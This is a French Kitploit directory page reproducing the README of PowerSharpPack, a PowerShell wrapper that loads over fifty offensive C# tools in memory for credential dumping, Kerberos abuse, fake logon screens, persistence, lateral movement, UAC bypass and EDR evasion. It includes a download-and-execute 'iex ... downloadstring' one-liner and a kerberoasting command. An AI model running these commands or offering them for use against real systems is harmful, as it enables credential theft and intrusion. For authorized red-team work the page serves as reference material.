Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/s3cur3th1ssh1t/powersharppack
Escalade de PrivilègesFrameworks d'ExploitationGénération de PayloadsMouvement LatéralCollecte d'InformationsPost-ExploitationTests d'IntrusionRed Teaming

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
s3cur3th1ssh1t/powersharppack

PowerSharpPack

Wrapper PowerShell regroupant plus de 50 outils de sécurité offensive en C# pour la post-exploitation, l'élévation de privilèges, l'extraction d'identifiants, le déplacement latéral et la reconnaissance Active Directory dans le cadre d'engagements d'équipe rouge.

Voir le dépôt
1.7k312il y a 1 anVérifié par Kitploit

Sponsorisé par

     

PowerSharpPack

De nombreux projets offensifs C# utiles, transformés en PowerShell pour une utilisation facile.

Pourquoi ? À mon avis personnel, le PowerShell offensif n'est pas mort à cause d'AMSI, du Script-block-logging, du mode langage contraint (Constrained Language Mode) ou d'autres fonctionnalités de protection. N'importe lequel de ces mécanismes peut être contourné. Étant donné que la plupart des nouveaux projets innovants en sécurité offensive sont écrits en C#, j'ai décidé de les rendre également utilisables dans PowerShell.

Alors, qu'ai-je fait concrètement ici ?

  1. D'abord, cloner chaque dépôt C#.
  2. Rendre les classes et les méthodes main publiques.
  3. Pour certains projets, j'ai fusionné des pull requests avec de nouvelles fonctionnalités ou des corrections de bugs, ou j'ai dû supprimer les instructions environment.exit pour que le processus PowerShell entier ne soit pas tué en cas de paramètres manquants, etc.
  4. Ensuite, compiler chaque binaire.
  5. Compresser en Gzip et encoder en Base64 le binaire compilé, puis le charger dans PowerShell via [System.Reflection.Assembly]::Load($DecompressedDecodedBinary).

C'est un processus très simple mais chronophage pour de nombreux dépôts.

Quels outils sont inclus ?

Internalmonologue

Internal Monologue Attack : récupération de hashs NTLM sans toucher à LSASS

@Crédit à : https://github.com/eladshamir/Internal-Monologue

Seatbelt

Seatbelt est un projet C# qui effectue un certain nombre de « vérifications de sécurité » orientées hôte, pertinentes tant pour la sécurité offensive que défensive.

@Crédit à : https://github.com/GhostPack/Seatbelt

SharpWeb

Projet .NET 2.0 CLR pour récupérer les identifiants enregistrés des navigateurs Google Chrome, Mozilla Firefox et Microsoft Internet Explorer/Edge.

@Crédit à : https://github.com/djhohnstein/SharpWeb

UrbanBishop

Crée une section RW locale dans UrbanBishop, puis mappe cette section en RX dans un processus distant. Chargement de shellcode simplifié.

@Crédit à : https://github.com/FuzzySecurity/Sharp-Suite

SharpUp

SharpUp est un portage C# de diverses fonctionnalités de PowerUp.

@Crédit à : https://github.com/GhostPack/SharpUp

Rubeus

Rubeus est un ensemble d'outils C# pour l'interaction brute avec Kerberos et ses abus.

@Crédit à : https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/

SharPersist

Boîte à outils de persistance Windows écrite en C#.

@Crédit à : https://github.com/fireeye/SharPersist

Sharpview

Implémentation C# de PowerView de harmj0y

@Crédit à : https://github.com/tevora-threat/SharpView

winPEAS

Vérifie la checklist d'élévation de privilèges Windows Locale du site book.hacktricks.xyz

@Crédit à : https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Lockless

Lockless permet la copie de fichiers verrouillés.

@Crédit à : https://github.com/GhostPack/Lockless

SharpChromium

Projet .NET 4.0 CLR pour récupérer les données Chromium, comme les cookies, l'historique et les connexions enregistrées.

@Crédit à : https://github.com/djhohnstein/SharpChromium

SharpDPAPI

SharpDPAPI est un portage C# de certaines fonctionnalités DPAPI de Mimikatz.

@Crédit à : https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/

SharpShares

Énumère tous les partages réseau du domaine courant. Peut également résoudre les noms en adresses IP.

@Crédit à : https://github.com/djhohnstein/SharpShares

SharpSniper

Trouve des utilisateurs spécifiques dans Active Directory via leur nom d'utilisateur et leur adresse IP de connexion

@Crédit à : https://github.com/HunnicCyber/SharpSniper

SharpSpray

SharpSpray est un ensemble de code simple pour effectuer une attaque par pulvérisation de mots de passe (password spraying) contre tous les utilisateurs d'un domaine via LDAP, compatible avec Cobalt Strike.

@Crédit à : https://github.com/jnqpblc/SharpSpray

Watson

Énumère les KB manquants et suggère des exploits pour les vulnérabilités utiles d'élévation de privilèges

@Crédit à : https://github.com/rasta-mouse/Watson

Grouper2

Trouve des vulnérabilités dans les stratégies de groupe Active Directory

@Crédit à : https://github.com/l0ss/Grouper2

Tokenvator

Un outil pour élever ses privilèges avec les jetons Windows

@Crédit à : https://github.com/0xbadjuju/Tokenvator

SauronEye

Outil de recherche pour trouver des fichiers spécifiques contenant des mots spécifiques, par exemple des fichiers contenant des mots de passe.

@Crédit à : https://github.com/vivami/SauronEye

Il suffit de charger le script principal avec

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')

et de choisir l'outil en paramètre d'interrupteur (switch), par exemple :

PowerSharpPack -seatbelt -Command "AMSIProviders"

alt text

Si vous souhaitez passer plusieurs paramètres au binaire, vous pouvez utiliser les guillemets comme ceci :

PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"

Si vous ne voulez pas charger tous les binaires pour certaines raisons, vous pouvez utiliser les scripts PowerShell par binaire situés dans le dossier PowerSharpBinaries.

Projets également disponibles en tant que script PowerShell autonome :

SharpCloud

Simple C# pour vérifier l'existence de fichiers d'identifiants liés à AWS, Microsoft Azure et Google Compute.

@Crédit à : https://github.com/chrismaddalena/SharpCloud

SharpSSDP

Découverte de services SSDP

@Crédit à : https://github.com/rvrsh3ll/SharpSSDP

DAFT

DAFT : cadre et boîte à outils d'audit de bases de données (Database Audit Framework & Toolkit)

@Crédit à : https://github.com/NetSPI/DAFT

Get-RBCD-Threaded

Outil pour découvrir les chemins d'attaque par délégation contrainte basée sur les ressources (Resource-Based Constrained Delegation) dans les environnements Active Directory

@Crédit à : https://github.com/FatRodzianko/Get-RBCD-Threaded

SharpGPO-RemoteAccessPolicies

Outil C# pour énumérer les politiques d'accès à distance via les stratégies de groupe.

@Crédit à : https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies

SharpAllowedToAct

Prise de contrôle d'objet ordinateur via la délégation contrainte basée sur les ressources (msDS-AllowedToActOnBehalfOfOtherIdentity)

@Crédit à : https://github.com/pkb1s/SharpAllowedToAct

WireTap

Projet .NET 4.0 pour interagir avec le matériel vidéo, audio et le clavier.

@Crédit à : https://github.com/djhohnstein/WireTap

SharpClipboard

Moniteur de presse-papiers C#

@Crédit à : https://github.com/slyd0g/SharpClipboard

SharpPrinter

Découvre les imprimantes et vérifie les vulnérabilités

@Crédit à : https://github.com/rvrsh3ll/SharpPrinter

SharpHide

Outil pour créer des clés de registre cachées.

@Crédit à : https://github.com/outflanknl/SharpHide

SpoolSample

Outil de preuve de concept (PoC) pour forcer des hôtes Windows à s'authentifier sur d'autres machines via l'interface RPC MS-RPRN. Possible également via d'autres protocoles.

@Crédit à : https://github.com/leechristensen/SpoolSample

SharpGPOAbuse

SharpGPOAbuse est une application .NET écrite en C# qui peut être utilisée pour exploiter les droits d'édition d'un utilisateur sur un objet de stratégie de groupe (GPO) afin de compromettre les objets contrôlés par ce GPO.

@Crédit à : https://github.com/FSecureLABS/SharpGPOAbuse

SharpDump

SharpDump est un portage C# de la fonctionnalité Out-Minidump.ps1 de PowerSploit.

@Crédit à : https://github.com/GhostPack/SharpDump

SharpHound3

Collecteur de données C# pour le projet BloodHound, version 3

@Crédit à : https://github.com/BloodHoundAD/SharpHound3

PostDump

Autre outil pour effectuer un minidump du processus LSASS en utilisant quelques techniques pour éviter la détection.

@Crédit à : https://github.com/YOLOP0wn/POSTDump

SharpLocker

SharpLocker permet d'obtenir les identifiants de l'utilisateur courant en faisant apparaître un faux écran de verrouillage Windows ; toute la sortie est envoyée vers la console, ce qui fonctionne parfaitement avec Cobalt Strike.

@Crédit à : https://github.com/Pickfordmatt/SharpLocker

Eyewitness

EyeWitness est conçu pour prendre des captures d'écran de sites web, fournir des informations d'en-tête serveur et identifier les identifiants par défaut si possible.

@Crédit à : https://github.com/FortyNorthSecurity/EyeWitness

FakeLogonScreen

Faux écran de connexion Windows pour voler des mots de passe

@Crédit à : https://github.com/bitsadmin/fakelogonscreen

P0wnedShell

Boîte à outils de post-exploitation PowerShell Runspace

@Crédit à : https://github.com/Cn33liz/p0wnedShell

Safetykatz

SafetyKatz est une combinaison d'une version légèrement modifiée du projet Mimikatz de @gentilkiwi et du chargeur PE .NET de @subTee Je l'ai modifié une nouvelle fois avec ma propre version obfusquée de Mimikatz.

@Crédit à : https://github.com/GhostPack/SafetyKatz

InveighZero

Outil de spoofing/man-in-the-middle LLMNR/mDNS/NBNS/DNS/DHCPv6 en C# Windows.

@Crédit à : https://github.com/Kevin-Robertson/InveighZero

SharpSploit

SharpSploit est une bibliothèque de post-exploitation .NET écrite en C#.

@Crédit à : https://github.com/cobbr/SharpSploit

Snaffler

Un outil pour les testeurs d'intrusion afin de trouver de délicieuses bonbons (candy), par @l0ss et @Sh3r4 ( Twitter: @/mikeloss et @/sh3r4_hax ).

@Crédit à : https://github.com/SnaffCon/Snaffler

BadPotato

Printspoofer d'itm4n en C#.

@Crédit à : https://github.com/BeichenDream/BadPotato

BetterSafetyKatz

Fork de SafetyKatz qui récupère dynamiquement la dernière version pré-compilée de Mimikatz directement depuis le dépôt GitHub de gentilkiwi, patch les signatures à l'exécution et utilise SharpSploit DInvoke pour charger le PE en mémoire.

@Crédit à : https://github.com/Flangvik/BetterSafetyKatz

SharpKatz

Portage C# des commandes sekurlsa::logonpasswords, sekurlsa::ekeys et lsadump::dcsync de mimikatz.

@Crédit à : https://github.com/b4rtik/SharpKatz

Gopher

Outil C# pour découvrir les « low hanging fruits » (cibles faciles).

@Crédit à : https://github.com/EncodeGroup/Gopher

SharpOxidResolver

IOXIDResolver d'AirBus Security/PingCastle.

@Crédit à : https://github.com/vletoux/pingcastle/

SharpBlock

Méthode pour contourner les DLL de projection active des EDR en empêchant l'exécution du point d'entrée.

@Crédit à : https://github.com/CCob/SharpBlock

SharpLoginPrompt

Ce programme crée une invite de connexion pour recueillir le nom d'utilisateur et le mot de passe de l'utilisateur courant. Ce projet permet à une équipe rouge de hameçonner le nom d'utilisateur et le mot de passe de l'utilisateur courant sans toucher à lsass et sans disposer de privilèges administrateur sur le système.

@Crédit à : https://github.com/shantanu561993/SharpLoginPrompt

ThunderFox

Récupère les données (contacts, emails, historique, cookies et identifiants) de Thunderbird et Firefox.

@Crédit à : https://github.com/V1V1/SharpScribbles

StickyNotesExtract

Extrait les données de la base de données des notes autocollantes Windows. Fonctionne sur Windows 10 Build 1607 et versions ultérieures. Ce projet ne dépend d'aucune dépendance externe.

@Crédit à : https://github.com/V1V1/SharpScribbles

SCShell

Outil de mouvement latéral sans fichier (fileless) qui repose sur ChangeServiceConfigA pour exécuter une commande.

@Crédit à : https://github.com/Mr-Un1k0d3r/SCShell

SharpSecDump

Portage .Net de la fonctionnalité de dump à distance SAM + LSA Secrets de secretsdump.py d'impacket.

@Crédit à : https://github.com/G0ldenGunSec/SharpSecDump

SharpHandler

Ce projet réutilise les handles ouverts vers lsass pour analyser ou minidumper lsass, vous n'avez donc pas besoin d'utiliser votre propre handle lsass pour interagir avec lui.

@Crédit à : https://github.com/jfmaes/SharpHandler

SharpRDP

Application console .NET pour le protocole de bureau à distance (RDP) afin d'exécuter des commandes authentifiées.

@Crédit à : https://github.com/0xthirteen/SharpRDP

SharpMove

Projet .NET pour effectuer une exécution distante authentifiée.

@Crédit à : https://github.com/0xthirteen/SharpMove

SharpStay

Projet .NET pour installer une persistance

@Crédit à : https://github.com/0xthirteen/SharpStay

SharpPrintNightmare

Implémentation C# de PrintNightmare CVE-2021-1675/CVE-2021-34527

@Crédit à : https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare

Certify

Abus des certificats Active Directory.

@Crédit à : https://github.com/GhostPack/Certify

Farmer

Farmer est un projet pour collecter des hashs NetNTLM dans un domaine Windows. Farmer y parvient en créant un serveur WebDAV local qui oblige le mini-redirecteur WebDAV à s'authentifier depuis tout client se connectant.

@Crédit à : https://github.com/mdsecactivebreach/Farmer

SharpBypassUAC

Outil C# pour les contournements de l'UAC

@Crédit à : https://github.com/FatRodzianko/SharpBypassUAC

StandIn

StandIn est une petite boîte à outils de post-exploitation AD .NET35/45

@Crédit à : https://github.com/FuzzySecurity/StandIn

Carbuncle

Outil pour interagir avec l'interopérabilité Outlook lors d'engagements d'équipe rouge

@Crédit à : https://github.com/checkymander/Carbuncle

Whisker

Whisker est un outil C# pour prendre le contrôle de comptes utilisateur et ordinateur Active Directory en manipulant leur attribut msDS-KeyCredentialLink, ajoutant ainsi des « Shadow Credentials » au compte cible.

@Crédit à : https://github.com/eladshamir/Whisker

SharpLdapRelayScan

Portage C# de LdapRelayScan

@Crédit à : https://github.com/klezVirus/SharpLdapRelayScan

LdapSignCheck

Projet C# pour vérifier la signature LDAP.

@Crédit à : https://github.com/cube0x0/LdapSignCheck

SharpImpersonation

SharpImpersonation - Un outil d'usurpation d'identité utilisateur - par jeton (Token) ou injection de shellcode.

@Crédit à : https://github.com/S3cur3Th1sSh1t/SharpImpersonation

SharpWSUS

SharpWSUS est un outil CSharp pour le mouvement latéral via WSUS. Un article de blog correspondant (https://labs.nettitude.com/blog/introducing-sharpwsus/) fournit des informations plus détaillées sur l'outil, son cas d'utilisation et sa détection.

@Crédit à : https://github.com/nettitude/SharpWSUS

MalSCCM

Cet outil permet d'abuser de serveurs SCCM locaux ou distants pour déployer des applications malveillantes sur les hôtes qu'ils gèrent. Pour utiliser cet outil, votre processus actuel doit disposer de droits d'administration sur le serveur SCCM. Typiquement, les déploiements SCCM placent le serveur de gestion et le serveur principal sur le même hôte, auquel cas l'hôte retourné par la commande locate peut être utilisé comme serveur principal.

@Crédit à : https://github.com/nettitude/MalSCCM

KrbRelay

Framework pour le relais Kerberos

@Crédit à : https://github.com/cube0x0/KrbRelay

SharpSCCM

Un utilitaire C# pour interagir avec SCCM

@Crédit : https://github.com/Mayyhem/SharpSCCM

ShadowSpray

Un outil pour pulvériser des Shadow Credentials sur l'ensemble d'un domaine dans l'espoir d'abuser de DACLs GenericWrite/GenericAll oubliées sur d'autres objets du domaine.

@Crédit : https://github.com/Dec0ne/ShadowSpray

Grouper3

Trouve des vulnérabilités dans les stratégies de groupe Active Directory, mais fait mieux que Grouper2.

@Crédit à : https://github.com/Group3r/Group3r

Les deux derniers ne sont en fait pas des assemblys. Mais j'ai créé un assembly pour les exécuter depuis la mémoire, chargeable via la technique de ce dépôt. Une autre technique en arrière-plan pour l'exécution, mais toujours utile:

HandleKatz

Dump PIC de lsass utilisant des handles clonés

@Crédit à : https://github.com/codewhitesec/HandleKatz

NanoDump

Dumper LSASS comme il se doit

@Crédit à : https://github.com/helpsystems/nanodump

PPLDump

Dumper la mémoire d'un PPL avec une exploitation au niveau utilisateur

@Crédit à : https://github.com/itm4n/PPLdump

Télécharger l’outil